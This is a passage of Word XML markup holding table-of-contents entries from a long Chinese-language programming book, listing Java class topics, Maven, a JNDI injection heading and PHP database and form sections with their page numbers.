              <w:t>Date</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类强大的时间处理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780162 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>811</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DFD4EED" w14:textId="255B8024" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780163" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>java.util.Arrays</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：操作数组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780163 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>813</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39C9AE8B" w14:textId="52C5F4BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780164" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780164 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>814</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0939D92D" w14:textId="58F31FFD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780165" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Math</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780165 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>821</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B4D3C30" w14:textId="3AEF0DF2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780166" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Character</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780166 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>826</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D0AB0B1" w14:textId="19E23C80" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780167" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780167 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>827</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E293312" w14:textId="048C7378" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780168" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>StringBuffer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780168 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>828</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D98F8ED" w14:textId="55E64E73" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780169" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不常见写法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780169 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>830</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50928F90" w14:textId="0AD19E28" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780170" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">== </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> equals </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的区别是什么？引用类型和值的比较是不一样的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780170 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>830</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="219A5DA2" w14:textId="20B147F1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780171" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>打包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780171 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>832</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A06CCEB" w14:textId="040B91C2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780172" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Maven</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780172 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>832</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31F02EA3" w14:textId="7118FF46" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780173" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>JNDI</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780173 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>834</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6639DFD4" w14:textId="50A79107" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780174" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780174 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>835</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="554CC632" w14:textId="0D9BE944" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780175" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写简单的网页</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780175 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>835</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D5C4181" w14:textId="03BBC722" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780176" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>建库建表导入数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780176 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>835</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5749EDCB" w14:textId="26B347C5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780177" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>直接查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780177 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>835</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A346F5E" w14:textId="402C2FAB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780178" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PDO</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查询及特性</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780178 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>836</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58A15532" w14:textId="484F229D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780179" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>提交参数的表单</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780179 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>838</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
